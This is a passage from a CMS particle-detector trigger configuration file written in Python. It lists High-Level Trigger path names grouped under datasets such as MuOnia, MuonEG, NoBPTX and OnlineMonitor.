'MC_IsoMu_v15',
'MC_PFBTagDeepCSV_v10',
'MC_PFHT_v16',
'MC_PFMET_v17',
'MC_PFMHT_v16',
'MC_ReducedIterativeTracking_v12' ),
MuOnia = cms.vstring( 'HLT_Dimuon0_Upsilon_L1_4p5NoOS_v8',
'HLT_Dimuon0_Upsilon_L1_4p5_v9',
'HLT_Dimuon0_Upsilon_L1_4p5er2p0M_v7',
'HLT_Dimuon0_Upsilon_L1_4p5er2p0_v9',
'HLT_Dimuon0_Upsilon_L1_5M_v8',
'HLT_Dimuon0_Upsilon_L1_5_v9',
'HLT_Dimuon0_Upsilon_Muon_L1_TM0_v6',
'HLT_Dimuon0_Upsilon_Muon_NoL1Mass_v6',
'HLT_Dimuon0_Upsilon_NoVertexing_v7',
'HLT_Dimuon12_Upsilon_y1p4_v2',
'HLT_Dimuon14_Phi_Barrel_Seagulls_v7',
'HLT_Dimuon24_Phi_noCorrL1_v6',
'HLT_Dimuon24_Upsilon_noCorrL1_v6',
'HLT_DoubleMu3_DoubleEle7p5_CaloIdL_TrackIdL_Upsilon_v4',
'HLT_DoubleMu5_Upsilon_DoubleEle3_CaloIdL_TrackIdL_v4',
'HLT_Mu20_TkMu0_Phi_v8',
'HLT_Mu25_TkMu0_Onia_v8',
'HLT_Mu25_TkMu0_Phi_v8',
'HLT_Mu30_TkMu0_Upsilon_v1',
'HLT_Mu7p5_L2Mu2_Upsilon_v10',
'HLT_Mu7p5_Track2_Upsilon_v11',
'HLT_Mu7p5_Track3p5_Upsilon_v11',
'HLT_Mu7p5_Track7_Upsilon_v11',
'HLT_Trimuon5_3p5_2_Upsilon_Muon_v5',
'HLT_TrimuonOpen_5_3p5_2_Upsilon_Muon_v3' ),
MuonEG = cms.vstring( 'HLT_DiMu4_Ele9_CaloIdL_TrackIdL_DZ_Mass3p8_v17',
'HLT_DiMu9_Ele9_CaloIdL_TrackIdL_DZ_v17',
'HLT_DiMu9_Ele9_CaloIdL_TrackIdL_v17',
'HLT_DoubleMu20_7_Mass0to30_L1_DM4EG_v8',
'HLT_DoubleMu20_7_Mass0to30_L1_DM4_v7',
'HLT_DoubleMu20_7_Mass0to30_Photon23_v8',
'HLT_Mu12_DoublePhoton20_v5',
'HLT_Mu12_TrkIsoVVL_Ele23_CaloIdL_TrackIdL_IsoVL_DZ_v15',
'HLT_Mu12_TrkIsoVVL_Ele23_CaloIdL_TrackIdL_IsoVL_v7',
'HLT_Mu17_Photon30_IsoCaloId_v6',
'HLT_Mu23_TrkIsoVVL_Ele12_CaloIdL_TrackIdL_IsoVL_DZ_v15',
'HLT_Mu23_TrkIsoVVL_Ele12_CaloIdL_TrackIdL_IsoVL_v7',
'HLT_Mu27_Ele37_CaloIdL_MW_v5',
'HLT_Mu37_Ele27_CaloIdL_MW_v5',
'HLT_Mu38NoFiltersNoVtxDisplaced_Photon38_CaloIdL_v1',
'HLT_Mu43NoFiltersNoVtxDisplaced_Photon43_CaloIdL_v1',
'HLT_Mu43NoFiltersNoVtx_Photon43_CaloIdL_v5',
'HLT_Mu48NoFiltersNoVtx_Photon48_CaloIdL_v5',
'HLT_Mu8_DiEle12_CaloIdL_TrackIdL_DZ_v18',
'HLT_Mu8_DiEle12_CaloIdL_TrackIdL_v18',
'HLT_Mu8_Ele8_CaloIdM_TrackIdM_Mass8_PFHT350_DZ_v19',
'HLT_Mu8_Ele8_CaloIdM_TrackIdM_Mass8_PFHT350_v19',
'HLT_Mu8_TrkIsoVVL_Ele23_CaloIdL_TrackIdL_IsoVL_DZ_CaloDiJet30_CaloBtagDeepCSV_1p5_v1',
'HLT_Mu8_TrkIsoVVL_Ele23_CaloIdL_TrackIdL_IsoVL_DZ_CaloDiJet30_v1',
'HLT_Mu8_TrkIsoVVL_Ele23_CaloIdL_TrackIdL_IsoVL_DZ_PFDiJet30_PFBtagDeepCSV_1p5_v1',
'HLT_Mu8_TrkIsoVVL_Ele23_CaloIdL_TrackIdL_IsoVL_DZ_PFDiJet30_v1',
'HLT_Mu8_TrkIsoVVL_Ele23_CaloIdL_TrackIdL_IsoVL_DZ_v13',
'HLT_Mu8_TrkIsoVVL_Ele23_CaloIdL_TrackIdL_IsoVL_v11' ),
NoBPTX = cms.vstring( 'HLT_CDC_L2cosmic_10_er1p0_v1',
'HLT_CDC_L2cosmic_5p5_er1p0_v1',
'HLT_L2Mu10_NoVertex_NoBPTX3BX_v5',
'HLT_L2Mu10_NoVertex_NoBPTX_v6',
'HLT_L2Mu40_NoVertex_3Sta_NoBPTX3BX_v5',
'HLT_L2Mu45_NoVertex_3Sta_NoBPTX3BX_v4',
'HLT_UncorrectedJetE30_NoBPTX3BX_v6',
'HLT_UncorrectedJetE30_NoBPTX_v6',
'HLT_UncorrectedJetE60_NoBPTX3BX_v6',
'HLT_UncorrectedJetE70_NoBPTX3BX_v6' ),
OnlineMonitor = ( cms.vstring( 'HLT_AK4CaloJet100_v10',
'HLT_AK4CaloJet120_v9',
'HLT_AK4CaloJet30_v11',
'HLT_AK4CaloJet40_v10',
'HLT_AK4CaloJet50_v10',
'HLT_AK4CaloJet80_v10',
'HLT_AK4PFJet100_v19',
'HLT_AK4PFJet120_v18',
'HLT_AK4PFJet30_v19',
'HLT_AK4PFJet50_v19',
'HLT_AK4PFJet80_v19',
'HLT_AK8PFHT750_TrimMass50_v12',
'HLT_AK8PFHT800_TrimMass50_v12',
'HLT_AK8PFHT850_TrimMass50_v11',
'HLT_AK8PFHT900_TrimMass50_v11',
'HLT_AK8PFJet140_v15',
'HLT_AK8PFJet15_v3',
'HLT_AK8PFJet200_v15',
'HLT_AK8PFJet25_v3',
'HLT_AK8PFJet260_v16',
'HLT_AK8PFJet320_v16',
'HLT_AK8PFJet330_TrimMass30_PFAK8BTagDeepCSV_p17_v2',
'HLT_AK8PFJet330_TrimMass30_PFAK8BTagDeepCSV_p1_v2',
'HLT_AK8PFJet330_TrimMass30_PFAK8BoostedDoubleB_np2_v2',
'HLT_AK8PFJet330_TrimMass30_PFAK8BoostedDoubleB_np4_v2',
'HLT_AK8PFJet330_TrimMass30_PFAK8BoostedDoubleB_p02_v3',
'HLT_AK8PFJet360_TrimMass30_v18',
'HLT_AK8PFJet380_TrimMass30_v11',
'HLT_AK8PFJet400_TrimMass30_v12',
'HLT_AK8PFJet400_v16',
'HLT_AK8PFJet40_v16',
'HLT_AK8PFJet420_TrimMass30_v11',
'HLT_AK8PFJet450_v16',
'HLT_AK8PFJet500_v16',
'HLT_AK8PFJet550_v11',
'HLT_AK8PFJet60_v15',
'HLT_AK8PFJet80_v15',
'HLT_AK8PFJetFwd140_v14',
'HLT_AK8PFJetFwd15_v3',
'HLT_AK8PFJetFwd200_v14',
'HLT_AK8PFJetFwd25_v3',
'HLT_AK8PFJetFwd260_v15',
'HLT_AK8PFJetFwd320_v15',
'HLT_AK8PFJetFwd400_v15',
'HLT_AK8PFJetFwd40_v15',
'HLT_AK8PFJetFwd450_v15',
'HLT_AK8PFJetFwd500_v15',
'HLT_AK8PFJetFwd60_v14',
'HLT_AK8PFJetFwd80_v14',
'HLT_BTagMu_AK4DiJet110_Mu5_noalgo_v13',
'HLT_BTagMu_AK4DiJet110_Mu5_v13',
'HLT_BTagMu_AK4DiJet170_Mu5_noalgo_v12',
'HLT_BTagMu_AK4DiJet170_Mu5_v12',
'HLT_BTagMu_AK4DiJet20_Mu5_noalgo_v13',
'HLT_BTagMu_AK4DiJet20_Mu5_v13',
'HLT_BTagMu_AK4DiJet40_Mu5_noalgo_v13',
'HLT_BTagMu_AK4DiJet40_Mu5_v13',
'HLT_BTagMu_AK4DiJet70_Mu5_noalgo_v13',
'HLT_BTagMu_AK4DiJet70_Mu5_v13',
'HLT_BTagMu_AK4Jet300_Mu5_noalgo_v12',
'HLT_BTagMu_AK4Jet300_Mu5_v12',
'HLT_BTagMu_AK8DiJet170_Mu5_noalgo_v9',
'HLT_BTagMu_AK8DiJet170_Mu5_v9',
'HLT_BTagMu_AK8Jet170_DoubleMu5_noalgo_v2',
'HLT_BTagMu_AK8Jet170_DoubleMu5_v2',
'HLT_BTagMu_AK8Jet300_Mu5_noalgo_v12',
'HLT_BTagMu_AK8Jet300_Mu5_v12',
'HLT_CDC_L2cosmic_10_er1p0_v1',
'HLT_CDC_L2cosmic_5p5_er1p0_v1',
'HLT_CaloJet500_NoJetID_v12',
'HLT_CaloJet550_NoJetID_v7',
'HLT_CaloMET100_NotCleaned_v4',
'HLT_CaloMET110_NotCleaned_v4',
'HLT_CaloMET250_NotCleaned_v4',
'HLT_CaloMET300_NotCleaned_v4',
'HLT_CaloMET350_NotCleaned_v4',
'HLT_CaloMET80_NotCleaned_v4',
'HLT_CaloMET90_NotCleaned_v4',
'HLT_CaloMHT90_v4',
'HLT_DiEle27_WPTightCaloOnly_L1DoubleEG_v4',
'HLT_DiJet110_35_Mjj650_PFMET110_v9',
'HLT_DiJet110_35_Mjj650_PFMET120_v9',
'HLT_DiJet110_35_Mjj650_PFMET130_v9',
'HLT_DiMu4_Ele9_CaloIdL_TrackIdL_DZ_Mass3p8_v17',
'HLT_DiMu9_Ele9_CaloIdL_TrackIdL_DZ_v17',
'HLT_DiMu9_Ele9_CaloIdL_TrackIdL_v17',
'HLT_DiPFJet15_FBEta3_NoCaloMatched_v17',
'HLT_DiPFJet15_NoCaloMatched_v16',
'HLT_DiPFJet25_FBEta3_NoCaloMatched_v17',
'HLT_DiPFJet25_NoCaloMatched_v16',
'HLT_DiPFJetAve100_HFJEC_v16',
'HLT_DiPFJetAve140_v13',
'HLT_DiPFJetAve15_HFJEC_v17',
'HLT_DiPFJetAve160_HFJEC_v16',
'HLT_DiPFJetAve200_v13',
'HLT_DiPFJetAve220_HFJEC_v16',
'HLT_DiPFJetAve25_HFJEC_v17',
'HLT_DiPFJetAve260_v14',
'HLT_DiPFJetAve300_HFJEC_v16',
'HLT_DiPFJetAve320_v14',
'HLT_DiPFJetAve35_HFJEC_v17',
'HLT_DiPFJetAve400_v14',
'HLT_DiPFJetAve40_v14',
'HLT_DiPFJetAve500_v14',
'HLT_DiPFJetAve60_HFJEC_v15',
'HLT_DiPFJetAve60_v14',
'HLT_DiPFJetAve80_HFJEC_v16',
'HLT_DiPFJetAve80_v13',
'HLT_DiSC30_18_EIso_AND_HE_Mass70_v13',
'HLT_Dimuon0_Jpsi3p5_Muon2_v5',
'HLT_Dimuon0_Jpsi_L1_4R_0er1p5R_v7',
'HLT_Dimuon0_Jpsi_L1_NoOS_v7',
'HLT_Dimuon0_Jpsi_NoVertexing_L1_4R_0er1p5R_v7',
'HLT_Dimuon0_Jpsi_NoVertexing_NoOS_v7',
'HLT_Dimuon0_Jpsi_NoVertexing_v8',
'HLT_Dimuon0_Jpsi_v8',
'HLT_Dimuon0_LowMass_L1_0er1p5R_v7',
'HLT_Dimuon0_LowMass_L1_0er1p5_v8',
'HLT_Dimuon0_LowMass_L1_4R_v7',
'HLT_Dimuon0_LowMass_L1_4_v8',
'HLT_Dimuon0_LowMass_L1_TM530_v6',
'HLT_Dimuon0_LowMass_v8',
'HLT_Dimuon0_Upsilon_L1_4p5NoOS_v8',
'HLT_Dimuon0_Upsilon_L1_4p5_v9',
'HLT_Dimuon0_Upsilon_L1_4p5er2p0M_v7',
'HLT_Dimuon0_Upsilon_L1_4p5er2p0_v9',
'HLT_Dimuon0_Upsilon_L1_5M_v8',
'HLT_Dimuon0_Upsilon_L1_5_v9',
'HLT_Dimuon0_Upsilon_Muon_L1_TM0_v6',
'HLT_Dimuon0_Upsilon_Muon_NoL1Mass_v6',
'HLT_Dimuon0_Upsilon_NoVertexing_v7',
'HLT_Dimuon10_PsiPrime_Barrel_Seagulls_v7',
'HLT_Dimuon12_Upsilon_y1p4_v2',
'HLT_Dimuon14_Phi_Barrel_Seagulls_v7',
'HLT_Dimuon18_PsiPrime_noCorrL1_v6',
'HLT_Dimuon18_PsiPrime_v14',
'HLT_Dimuon20_Jpsi_Barrel_Seagulls_v7',
'HLT_Dimuon24_Phi_noCorrL1_v6',
'HLT_Dimuon24_Upsilon_noCorrL1_v6',
'HLT_Dimuon25_Jpsi_noCorrL1_v6',
'HLT_Dimuon25_Jpsi_v14',
'HLT_Diphoton30PV_18PV_R9Id_AND_IsoCaloId_AND_HE_R9Id_NoPixelVeto_Mass55_v13',
'HLT_Diphoton30PV_18PV_R9Id_AND_IsoCaloId_AND_HE_R9Id_PixelVeto_Mass55_v15',
'HLT_Diphoton30_18_R9IdL_AND_HE_AND_IsoCaloId_NoPixelVeto_Mass55_v2',
'HLT_Diphoton30_18_R9IdL_AND_HE_AND_IsoCaloId_NoPixelVeto_v2',
'HLT_Diphoton30_22_R9Id_OR_IsoCaloId_AND_HE_R9Id_Mass90_v13',
'HLT_Diphoton30_22_R9Id_OR_IsoCaloId_AND_HE_R9Id_Mass95_v13',
'HLT_DoubleEle25_CaloIdL_MW_v4',
'HLT_DoubleEle27_CaloIdL_MW_v4',
'HLT_DoubleEle33_CaloIdL_MW_v17',
'HLT_DoubleEle8_CaloIdM_TrackIdM_Mass8_DZ_PFHT350_v20',
'HLT_DoubleEle8_CaloIdM_TrackIdM_Mass8_PFHT350_v20',
'HLT_DoubleL2Mu23NoVtx_2Cha_CosmicSeed_NoL2Matched_v2',
'HLT_DoubleL2Mu23NoVtx_2Cha_CosmicSeed_v2',
'HLT_DoubleL2Mu23NoVtx_2Cha_NoL2Matched_v2',
'HLT_DoubleL2Mu23NoVtx_2Cha_v2',
'HLT_DoubleL2Mu25NoVtx_2Cha_CosmicSeed_Eta2p4_v2',
'HLT_DoubleL2Mu25NoVtx_2Cha_CosmicSeed_NoL2Matched_v2',
'HLT_DoubleL2Mu25NoVtx_2Cha_CosmicSeed_v2',
'HLT_DoubleL2Mu25NoVtx_2Cha_Eta2p4_v2',
'HLT_DoubleL2Mu25NoVtx_2Cha_NoL2Matched_v2',
'HLT_DoubleL2Mu25NoVtx_2Cha_v2',
'HLT_DoubleL2Mu30NoVtx_2Cha_CosmicSeed_Eta2p4_v2',
'HLT_DoubleL2Mu30NoVtx_2Cha_Eta2p4_v2',
'HLT_DoubleL2Mu50_v2',
'HLT_DoubleMediumChargedIsoPFTauHPS30_L1MaxMass_Trk1_eta2p1_Reg_v1',
'HLT_DoubleMediumChargedIsoPFTauHPS35_Trk1_TightID_eta2p1_Reg_v1',
'HLT_DoubleMediumChargedIsoPFTauHPS35_Trk1_eta2p1_Reg_v4',
'HLT_DoubleMediumChargedIsoPFTauHPS40_Trk1_TightID_eta2p1_Reg_v1',
'HLT_DoubleMediumChargedIsoPFTauHPS40_Trk1_eta2p1_Reg_v1',
'HLT_DoubleMu20_7_Mass0to30_L1_DM4EG_v8',
'HLT_DoubleMu20_7_Mass0to30_L1_DM4_v7',
'HLT_DoubleMu20_7_Mass0to30_Photon23_v8',
'HLT_DoubleMu2_Jpsi_DoubleTkMu0_Phi_v5',
'HLT_DoubleMu2_Jpsi_DoubleTrk1_Phi1p05_v6',
'HLT_DoubleMu33NoFiltersNoVtxDisplaced_v1',
'HLT_DoubleMu3_DCA_PFMET50_PFMHT60_v10',
'HLT_DoubleMu3_DZ_PFMET50_PFMHT60_v10',
'HLT_DoubleMu3_DZ_PFMET70_PFMHT70_v10',
'HLT_DoubleMu3_DZ_PFMET90_PFMHT90_v10',
'HLT_DoubleMu3_DoubleEle7p5_CaloIdL_TrackIdL_Upsilon_v4',
'HLT_DoubleMu3_TkMu_DsTau3Mu_v4',
'HLT_DoubleMu3_Trk_Tau3mu_NoL1Mass_v6',
'HLT_DoubleMu3_Trk_Tau3mu_v12',
'HLT_DoubleMu40NoFiltersNoVtxDisplaced_v1',
'HLT_DoubleMu43NoFiltersNoVtx_v4',
'HLT_DoubleMu48NoFiltersNoVtx_v4',
'HLT_DoubleMu4_3_Bs_v14',
'HLT_DoubleMu4_3_Jpsi_v2',
'HLT_DoubleMu4_JpsiTrkTrk_Displaced_v7',
'HLT_DoubleMu4_JpsiTrk_Displaced_v15',
'HLT_DoubleMu4_Jpsi_Displaced_v7',
'HLT_DoubleMu4_Jpsi_NoVertexing_v7',
'HLT_DoubleMu4_LowMassNonResonantTrk_Displaced_v15',
'HLT_DoubleMu4_Mass3p8_DZ_PFHT350_v8',
'HLT_DoubleMu4_PsiPrimeTrk_Displaced_v15',
'HLT_DoubleMu5_Upsilon_DoubleEle3_CaloIdL_TrackIdL_v4',
'HLT_DoublePFJets100_CaloBTagDeepCSV_p71_v2',
'HLT_DoublePFJets116MaxDeta1p6_DoubleCaloBTagDeepCSV_p71_v2',
'HLT_DoublePFJets128MaxDeta1p6_DoubleCaloBTagDeepCSV_p71_v2',
'HLT_DoublePFJets200_CaloBTagDeepCSV_p71_v2',
'HLT_DoublePFJets350_CaloBTagDeepCSV_p71_v2',
'HLT_DoublePFJets40_CaloBTagDeepCSV_p71_v2',
'HLT_DoublePhoton33_CaloIdL_v6',
'HLT_DoublePhoton70_v6',
'HLT_DoublePhoton85_v14',
'HLT_DoubleTightChargedIsoPFTauHPS35_Trk1_TightID_eta2p1_Reg_v1',
'HLT_DoubleTightChargedIsoPFTauHPS35_Trk1_eta2p1_Reg_v1',
'HLT_DoubleTightChargedIsoPFTauHPS40_Trk1_TightID_eta2p1_Reg_v1',
'HLT_DoubleTightChargedIsoPFTauHPS40_Trk1_eta2p1_Reg_v1',
'HLT_ECALHT800_v10',
'HLT_Ele115_CaloIdVT_GsfTrkIdT_v14',
'HLT_Ele12_CaloIdL_TrackIdL_IsoVL_PFJet30_v18',
'HLT_Ele135_CaloIdVT_GsfTrkIdT_v7',
'HLT_Ele145_CaloIdVT_GsfTrkIdT_v8',
'HLT_Ele15_CaloIdL_TrackIdL_IsoVL_PFJet30_v3',
'HLT_Ele15_Ele8_CaloIdL_TrackIdL_IsoVL_v3',
'HLT_Ele15_IsoVVVL_PFHT450_CaloBTagDeepCSV_4p5_v8',
'HLT_Ele15_IsoVVVL_PFHT450_PFMET50_v16',
'HLT_Ele15_IsoVVVL_PFHT450_v16',
'HLT_Ele15_IsoVVVL_PFHT600_v20',
'HLT_Ele15_WPLoose_Gsf_v3',
'HLT_Ele16_Ele12_Ele8_CaloIdL_TrackIdL_v9',
'HLT_Ele17_CaloIdM_TrackIdM_PFJet30_v16',
'HLT_Ele17_WPLoose_Gsf_v3',
'HLT_Ele200_CaloIdVT_GsfTrkIdT_v8',
'HLT_Ele20_WPLoose_Gsf_v6',
'HLT_Ele20_WPTight_Gsf_v6',
'HLT_Ele20_eta2p1_WPLoose_Gsf_v6',
'HLT_Ele23_CaloIdL_TrackIdL_IsoVL_PFJet30_v18',
'HLT_Ele23_CaloIdM_TrackIdM_PFJet30_v18',
'HLT_Ele23_Ele12_CaloIdL_TrackIdL_IsoVL_DZ_v19',
'HLT_Ele23_Ele12_CaloIdL_TrackIdL_IsoVL_v19',
'HLT_Ele24_eta2p1_WPTight_Gsf_LooseChargedIsoPFTauHPS30_eta2p1_CrossL1_v1',
'HLT_Ele24_eta2p1_WPTight_Gsf_LooseChargedIsoPFTauHPS30_eta2p1_TightID_CrossL1_v1',
'HLT_Ele24_eta2p1_WPTight_Gsf_MediumChargedIsoPFTauHPS30_eta2p1_CrossL1_v1',
'HLT_Ele24_eta2p1_WPTight_Gsf_MediumChargedIsoPFTauHPS30_eta2p1_TightID_CrossL1_v1',
'HLT_Ele24_eta2p1_WPTight_Gsf_TightChargedIsoPFTauHPS30_eta2p1_CrossL1_v1',
'HLT_Ele24_eta2p1_WPTight_Gsf_TightChargedIsoPFTauHPS30_eta2p1_TightID_CrossL1_v1',
'HLT_Ele250_CaloIdVT_GsfTrkIdT_v13',
'HLT_Ele27_Ele37_CaloIdL_MW_v4',
'HLT_Ele27_WPTight_Gsf_v16',
'HLT_Ele28_HighEta_SC20_Mass55_v13',
'HLT_Ele28_WPTight_Gsf_v1',
'HLT_Ele28_eta2p1_WPTight_Gsf_HT150_v13',
'HLT_Ele300_CaloIdVT_GsfTrkIdT_v13',
'HLT_Ele30_WPTight_Gsf_v1',
'HLT_Ele30_eta2p1_WPTight_Gsf_CentralPFJet35_EleCleaned_v13',
'HLT_Ele32_WPTight_Gsf_L1DoubleEG_v9',
'HLT_Ele32_WPTight_Gsf_v15',
'HLT_Ele35_WPTight_Gsf_L1EGMT_v5',
'HLT_Ele35_WPTight_Gsf_v9',
'HLT_Ele38_WPTight_Gsf_v9',
'HLT_Ele40_WPTight_Gsf_v9',
'HLT_Ele50_CaloIdVT_GsfTrkIdT_PFJet165_v18')+cms.vstring( 'HLT_Ele50_IsoVVVL_PFHT450_v16',
'HLT_Ele8_CaloIdL_TrackIdL_IsoVL_PFJet30_v16',
'HLT_Ele8_CaloIdM_TrackIdM_PFJet30_v18',
'HLT_HT400_DisplacedDijet40_DisplacedTrack_v13',
'HLT_HT425_v9',
'HLT_HT430_DisplacedDijet40_DisplacedTrack_v13',
'HLT_HT430_DisplacedDijet60_DisplacedTrack_v13',
'HLT_HT500_DisplacedDijet40_DisplacedTrack_v13',
'HLT_HT550_DisplacedDijet60_Inclusive_v13',
'HLT_HT650_DisplacedDijet60_Inclusive_v13',
'HLT_HcalIsolatedbunch_v5',
'HLT_HcalNZS_v13',
'HLT_HcalPhiSym_v15',
'HLT_IsoMu20_eta2p1_LooseChargedIsoPFTauHPS27_eta2p1_CrossL1_v4',
'HLT_IsoMu20_eta2p1_LooseChargedIsoPFTauHPS27_eta2p1_TightID_CrossL1_v1',
'HLT_IsoMu20_eta2p1_MediumChargedIsoPFTauHPS27_eta2p1_CrossL1_v1',
'HLT_IsoMu20_eta2p1_MediumChargedIsoPFTauHPS27_eta2p1_TightID_CrossL1_v1',
'HLT_IsoMu20_eta2p1_TightChargedIsoPFTauHPS27_eta2p1_CrossL1_v1',
'HLT_IsoMu20_eta2p1_TightChargedIsoPFTauHPS27_eta2p1_TightID_CrossL1_v1',
'HLT_IsoMu20_v15',
'HLT_IsoMu24_TwoProngs35_v1',
'HLT_IsoMu24_eta2p1_v15',
'HLT_IsoMu24_v13',
'HLT_IsoMu27_v16',
'HLT_IsoMu30_v4',
'HLT_IsoTrackHB_v4',
'HLT_IsoTrackHE_v4',
'HLT_L1ETMHadSeeds_v2',
'HLT_L1NotBptxOR_v3',
'HLT_L1SingleMu18_v3',
'HLT_L1SingleMu25_v2',
'HLT_L1SingleMuCosmics_v1',
'HLT_L1UnpairedBunchBptxMinus_v2',
'HLT_L1UnpairedBunchBptxPlus_v2',
'HLT_L1_CDC_SingleMu_3_er1p2_TOP120_DPHI2p618_3p142_v2',
'HLT_L2Mu10_NoVertex_NoBPTX3BX_v5',
'HLT_L2Mu10_NoVertex_NoBPTX_v6',
'HLT_L2Mu10_v7',
'HLT_L2Mu40_NoVertex_3Sta_NoBPTX3BX_v5',
'HLT_L2Mu45_NoVertex_3Sta_NoBPTX3BX_v4',
'HLT_L2Mu50_v2',
'HLT_MET105_IsoTrk50_v9',
'HLT_MET120_IsoTrk50_v9',
'HLT_MediumChargedIsoPFTau180HighPtRelaxedIso_Trk50_eta2p1_1pr_v11',
'HLT_MediumChargedIsoPFTau180HighPtRelaxedIso_Trk50_eta2p1_v12',
'HLT_MediumChargedIsoPFTau200HighPtRelaxedIso_Trk50_eta2p1_v12',
'HLT_MediumChargedIsoPFTau220HighPtRelaxedIso_Trk50_eta2p1_v12',
'HLT_MediumChargedIsoPFTau50_Trk30_eta2p1_1pr_MET100_v12',
'HLT_MediumChargedIsoPFTau50_Trk30_eta2p1_1pr_MET110_v8',
'HLT_MediumChargedIsoPFTau50_Trk30_eta2p1_1pr_MET120_v8',
'HLT_MediumChargedIsoPFTau50_Trk30_eta2p1_1pr_MET130_v8',
'HLT_MediumChargedIsoPFTau50_Trk30_eta2p1_1pr_MET140_v3',
'HLT_MediumChargedIsoPFTau50_Trk30_eta2p1_1pr_MET90_v12',
'HLT_MediumChargedIsoPFTau50_Trk30_eta2p1_1pr_v12',
'HLT_MonoCentralPFJet80_PFMETNoMu110_PFMHTNoMu110_IDTight_v20',
'HLT_MonoCentralPFJet80_PFMETNoMu120_PFMHTNoMu120_IDTight_v20',
'HLT_MonoCentralPFJet80_PFMETNoMu130_PFMHTNoMu130_IDTight_v19',
'HLT_MonoCentralPFJet80_PFMETNoMu140_PFMHTNoMu140_IDTight_v19',
'HLT_Mu10_TrkIsoVVL_DiPFJet40_DEta3p5_MJJ750_HTT350_PFMETNoMu60_v15',
'HLT_Mu12_DoublePFJets100_CaloBTagDeepCSV_p71_v2',
'HLT_Mu12_DoublePFJets200_CaloBTagDeepCSV_p71_v2',
'HLT_Mu12_DoublePFJets350_CaloBTagDeepCSV_p71_v2',
'HLT_Mu12_DoublePFJets40MaxDeta1p6_DoubleCaloBTagDeepCSV_p71_v2',
'HLT_Mu12_DoublePFJets40_CaloBTagDeepCSV_p71_v2',
'HLT_Mu12_DoublePFJets54MaxDeta1p6_DoubleCaloBTagDeepCSV_p71_v2',
'HLT_Mu12_DoublePFJets62MaxDeta1p6_DoubleCaloBTagDeepCSV_p71_v2',
'HLT_Mu12_DoublePhoton20_v5',
'HLT_Mu12_TrkIsoVVL_Ele23_CaloIdL_TrackIdL_IsoVL_DZ_v15',
'HLT_Mu12_TrkIsoVVL_Ele23_CaloIdL_TrackIdL_IsoVL_v7',
'HLT_Mu12_v3',
'HLT_Mu15_IsoVVVL_PFHT450_CaloBTagDeepCSV_4p5_v8',
'HLT_Mu15_IsoVVVL_PFHT450_PFMET50_v15',
'HLT_Mu15_IsoVVVL_PFHT450_v15',
'HLT_Mu15_IsoVVVL_PFHT600_v19',
'HLT_Mu15_v3',
'HLT_Mu17_Photon30_IsoCaloId_v6',
'HLT_Mu17_TrkIsoVVL_Mu8_TrkIsoVVL_DZ_Mass3p8_v5',
'HLT_Mu17_TrkIsoVVL_Mu8_TrkIsoVVL_DZ_Mass8_v5',
'HLT_Mu17_TrkIsoVVL_Mu8_TrkIsoVVL_DZ_v15',
'HLT_Mu17_TrkIsoVVL_Mu8_TrkIsoVVL_v14',
'HLT_Mu17_TrkIsoVVL_v13',
'HLT_Mu17_v13',
'HLT_Mu18_Mu9_DZ_v4',
'HLT_Mu18_Mu9_SameSign_DZ_v4',
'HLT_Mu18_Mu9_SameSign_v4',
'HLT_Mu18_Mu9_v4',
'HLT_Mu19_TrkIsoVVL_Mu9_TrkIsoVVL_DZ_Mass3p8_v3',
'HLT_Mu19_TrkIsoVVL_Mu9_TrkIsoVVL_DZ_Mass8_v3',
'HLT_Mu19_TrkIsoVVL_Mu9_TrkIsoVVL_DZ_v3',
'HLT_Mu19_TrkIsoVVL_Mu9_TrkIsoVVL_v3',
'HLT_Mu19_TrkIsoVVL_v4',
'HLT_Mu19_v4',
'HLT_Mu20_Mu10_DZ_v4',
'HLT_Mu20_Mu10_SameSign_DZ_v4',
'HLT_Mu20_Mu10_SameSign_v4',
'HLT_Mu20_Mu10_v4',
'HLT_Mu20_TkMu0_Phi_v8',
'HLT_Mu20_v12',
'HLT_Mu23_Mu12_DZ_v4',
'HLT_Mu23_Mu12_SameSign_DZ_v4',
'HLT_Mu23_Mu12_SameSign_v4',
'HLT_Mu23_Mu12_v4',
'HLT_Mu23_TrkIsoVVL_Ele12_CaloIdL_TrackIdL_IsoVL_DZ_v15',
'HLT_Mu23_TrkIsoVVL_Ele12_CaloIdL_TrackIdL_IsoVL_v7',
'HLT_Mu25_TkMu0_Onia_v8',
'HLT_Mu25_TkMu0_Phi_v8',
'HLT_Mu27_Ele37_CaloIdL_MW_v5',
'HLT_Mu27_v13',
'HLT_Mu30_TkMu0_Psi_v1',
'HLT_Mu30_TkMu0_Upsilon_v1',
'HLT_Mu37_Ele27_CaloIdL_MW_v5',
'HLT_Mu37_TkMu27_v5',
'HLT_Mu38NoFiltersNoVtxDisplaced_Photon38_CaloIdL_v1',
'HLT_Mu3_PFJet40_v16',
'HLT_Mu3er1p5_PFJet100er2p5_PFMET100_PFMHT100_IDTight_v2',
'HLT_Mu3er1p5_PFJet100er2p5_PFMET70_PFMHT70_IDTight_v2',
'HLT_Mu3er1p5_PFJet100er2p5_PFMET80_PFMHT80_IDTight_v2',
'HLT_Mu3er1p5_PFJet100er2p5_PFMET90_PFMHT90_IDTight_v2',
'HLT_Mu3er1p5_PFJet100er2p5_PFMETNoMu100_PFMHTNoMu100_IDTight_v2',
'HLT_Mu3er1p5_PFJet100er2p5_PFMETNoMu70_PFMHTNoMu70_IDTight_v2',
'HLT_Mu3er1p5_PFJet100er2p5_PFMETNoMu80_PFMHTNoMu80_IDTight_v2',
'HLT_Mu3er1p5_PFJet100er2p5_PFMETNoMu90_PFMHTNoMu90_IDTight_v2',
'HLT_Mu43NoFiltersNoVtxDisplaced_Photon43_CaloIdL_v1',
'HLT_Mu43NoFiltersNoVtx_Photon43_CaloIdL_v5',
'HLT_Mu48NoFiltersNoVtx_Photon48_CaloIdL_v5',
'HLT_Mu4_TrkIsoVVL_DiPFJet90_40_DEta3p5_MJJ750_HTT300_PFMETNoMu60_v15',
'HLT_Mu50_IsoVVVL_PFHT450_v15',
'HLT_Mu50_v13',
'HLT_Mu55_v3',
'HLT_Mu7p5_L2Mu2_Jpsi_v10',
'HLT_Mu7p5_L2Mu2_Upsilon_v10',
'HLT_Mu7p5_Track2_Jpsi_v11',
'HLT_Mu7p5_Track2_Upsilon_v11',
'HLT_Mu7p5_Track3p5_Jpsi_v11',
'HLT_Mu7p5_Track3p5_Upsilon_v11',
'HLT_Mu7p5_Track7_Jpsi_v11',
'HLT_Mu7p5_Track7_Upsilon_v11',
'HLT_Mu8_DiEle12_CaloIdL_TrackIdL_DZ_v18',
'HLT_Mu8_DiEle12_CaloIdL_TrackIdL_v18',
